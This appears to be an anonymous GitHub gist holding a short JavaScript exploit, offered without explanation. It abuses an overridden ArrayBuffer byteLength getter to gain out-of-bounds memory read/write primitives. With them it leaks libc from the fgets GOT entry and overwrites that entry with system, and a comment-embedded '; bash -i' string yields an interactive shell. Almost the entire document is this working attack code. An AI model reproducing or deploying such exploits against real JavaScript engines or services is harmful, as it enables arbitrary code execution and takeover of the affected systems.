Skip to content

Instantly share code, notes, and snippets.

/gist:b2340ac8429f4c5d186c

Created June 1, 2014 18:37
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save anonymous/b2340ac8429f4c5d186c to your computer and use it in GitHub Desktop.
Save anonymous/b2340ac8429f4c5d186c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.js
var ab1 = new ArrayBuffer(8);
function hex(n) { return n.toString(16); }
ab1.__defineGetter__("byteLength", function() { return 0xFFFFFFFC; });
var view = new Uint32Array(ab1);
var fgets_got = 0x91680A8;
var warning_addr = 0x0857E400; // 0x5761726e
var my_buf = view[18] - 0x2e28
function peek(addr) { var diff = addr - my_buf; if (diff < 0) diff += 0x100000000; return view[diff/4]; }
function poke(addr, val) { var diff = addr - my_buf; if (diff < 0) diff += 0x100000000; view[diff/4] = val; }
var libc_base = peek(fgets_got) - 0x64660;
var system = libc_base + 0x403b0;
/*; bash -i ;#*/poke(fgets_got, system);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment